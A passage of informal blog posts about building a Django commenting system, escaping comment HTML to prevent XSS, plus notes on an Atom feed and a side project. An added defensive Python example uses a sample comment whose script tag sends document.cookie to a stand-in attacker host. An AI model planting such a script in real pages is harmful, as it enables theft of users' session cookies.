the elusive commenting system

BDT (yeah, third post in, already acronym-ising this thing) finally has one of them there commenting systems. Check it out below if you don’t believe me.

The delay

The reason I was holding back was that I wanted to “hand-roll” my system for maximum control. Yeah, this is a gross violation of “don’t reinvent the wheel” (Django has a comments module), but sometimes invention is fun even if you’re contributing nothing new to anything. My main motivation for spitting in the face of Django was that at some stage I want to play with Akismet. There are tutorials out there for adding Akismet using the existing comments system; however, they all involve altering core Django code and I sorta felt that this could be a bit messy – particularly in terms of maintenance further down the line.

The problem

The Django API makes it a breeze to add a comment; the big problem comes in escaping stray HTML / JavaScript etc. I could write my own sanitiser – it probably wouldn’t be all that hard, but I would never want to reinvent the wheel (I’m banking on 90% of readers skimming the last paragraph). The only method out there in Django seems to be the escape filter in the template system – and that’s only going to be directly useful in sanitising the main blog page, and only then if I explicitly tell it to on every template. It won’t stop somebody from submitting code that then messes about with my admin page, for example. But the method itself is useful: it is powerful, and in one call it escapes the characters that markup depends on, which takes care of any potential offensiveness (by offensiveness I mean XSS etc, not the word “dick” – we wouldn’t want to prevent people from commenting about their favourite British pudding now, would we?).

The solution

PS I have stumbled upon this idea in surfing, but cannot remember where, if you were the originator, tell me and I’ll give due credit.

To harness the escape method, first you need to hook into the django.template module – specifically the Parser class (I was stumbling about aimlessly in the python shell when I finally cracked this one, there is probably a better way of doing this). On an instance of the Parser class you call the find_filter method with the filter’s name, and it returns the escape function, which you can then use at will. So, sticking this in your “add a comment” view-method-thing would look a little like this:

from django.template import Parser

...ace django code goes here...

# Parser wants a list of template tokens; an empty list is enough, since we only
# need the filter registry it builds when constructed (you could probably put
# anything in here, I should probably try looking for a static class or something
# more efficient).
p = Parser([])
esc = p.find_filter("escape")
# Escape the comment before it hits the database, so nothing that can open a
# tag survives into any page that later renders it.
new_comment.content = esc(new_comment.content)

...more ace django code...

note to self: find / implement a “code” template module. Preferably with syntax highlighting built in.

obviously, you’ll want to do some content checks and the like, but you get the general idea. I am of the opinion that if you are not super paranoid about what you let into an effectively open database then you are asking for trouble. If you need further proof (beyond common sense), look at all of the trouble myspace have had over the years.
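As an added illustration (not code from the blog), here is the same escaping step in plain Python, using the standard library’s html.escape, which rewrites the same five characters (&, <, >, " and ') as Django’s escape filter; the filter itself is a thin wrapper around django.utils.html.escape, which you can import directly instead of going through Parser. Because it does not import Django, it runs anywhere. It also adds the check a practitioner wants before trusting the stored text (nothing that can open a tag or attribute survives) and shows what happens when text escaped on the way in is escaped again by the template on the way out, which is the default in Django templates since 1.0: the reader sees literal &lt;script&gt; instead of clean text. That is the trade-off to weigh against the protect-the-admin-page argument above. The sample comment is constructed for the example.

```python
import html
import re

# Constructed sample input, not taken from the blog: a comment carrying the
# sort of stray JavaScript the post wants kept out of the page.
SAMPLE_COMMENT = (
    'Great post! <script>new Image().src='
    '"http://attacker.invalid/?c="+document.cookie</script> <3'
)

# Entities that Django's escape filter (and html.escape) emit; &#39; is the
# older Django spelling of the apostrophe.
_ENTITY_RE = re.compile(r"&(?:amp|lt|gt|quot|#x27|#39);")


def escape_for_html(text: str) -> str:
    """Stand-in for the post's esc(new_comment.content) step.

    html.escape(quote=True) rewrites & < > " ' exactly as Django's escape does
    (assumption stated in the lead-in: we deliberately avoid importing Django).
    """
    return html.escape(text, quote=True)


def is_html_inert(text: str) -> bool:
    """True when nothing in text can open a tag, attribute or raw entity.

    The only '&' allowed is the start of an entity we would have emitted;
    '<', '>', '"' and "'" must not survive at all.
    """
    pattern = r"(?:[^<>\"'&]|&(?:amp|lt|gt|quot|#x27|#39);)*"
    return re.fullmatch(pattern, text) is not None


def looks_pre_escaped(text: str) -> bool:
    """Heuristic for rows already escaped on input: the entities are present."""
    return _ENTITY_RE.search(text) is not None


def render_autoescaped(stored: str) -> str:
    """Models a template that escapes output by default (Django >= 1.0)."""
    return html.escape(stored, quote=True)


def escaped_on_input_then_rendered(raw: str) -> str:
    """The post's approach (escape before storing) combined with output escaping."""
    return render_autoescaped(escape_for_html(raw))


def escaped_on_output_only(raw: str) -> str:
    """Store the comment raw and escape exactly once at render time."""
    return render_autoescaped(raw)


if __name__ == "__main__":
    stored = escape_for_html(SAMPLE_COMMENT)
    print("stored:        ", stored)
    print("inert:         ", is_html_inert(stored))
    print("escaped once:  ", escaped_on_output_only(SAMPLE_COMMENT))
    print("escaped twice: ", escaped_on_input_then_rendered(SAMPLE_COMMENT))
```

Running it shows the stored form contains &lt;script&gt; and passes is_html_inert, while the "escaped twice" line contains &amp;lt;script&amp;gt;, which a browser displays as the literal text &lt;script&gt;. If you do keep escaping on input, either mark the field as safe when rendering or use looks_pre_escaped to spot rows that need unescaping before switching to output-only escaping.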

Still to come…

hmmmm, somehow this has formed itself into BDT’s first “proper” entry, I should probably have planned it better. Anyway, next on my list are per-category feeds, a bit of an “about” section and then some playing with Django vs Jabber interactivity. Should be fun, yay!

keeping this thing updated

…is a royal pain in the bollock. Figure I should give a small checklist of what Si has been working on:

XML Feed

I have just finished implementing an Atom feed for this mofo. It was ridiculously simple using Django – create a feed class, point the url file at it and you’re away. I think I will have to stick some per-category feeds in because that was waaaay too easy.

Comments System

I am working on getting a comments system sorted ASAP, I think the power of blogging is in the dialogue – without it you have a glorified ego-wank. The aforementioned feed will not be going live until this is all cleared and working.

Super hyper mega WEB APP!!!

Hayley and me – we had one of them $5 ideas* that she swears is gonna make us a million. I am not so sure. I just want to be able to say that I have successfully deployed a working web application, rather than being a dumb simpleton who has no idea of the rigours involved. The app itself is pretty useless to anyone not of the myspace generation and it took me just 45 minutes to manufacture a proof of concept (again – thanks to my boyfriend, Django) – but there is always a chance that Fox will give me £50 for it within the next 10 months, therefore making me a profit on my hosting. Wooyay.

* ok, it’s probably closer to 50p.

So yeah – still plenty on my plate, next post will hopefully be about this mysterious wAPP (saying it aloud like that is strangely satisfying), if not inviting you – my non-readers – to leave a comment.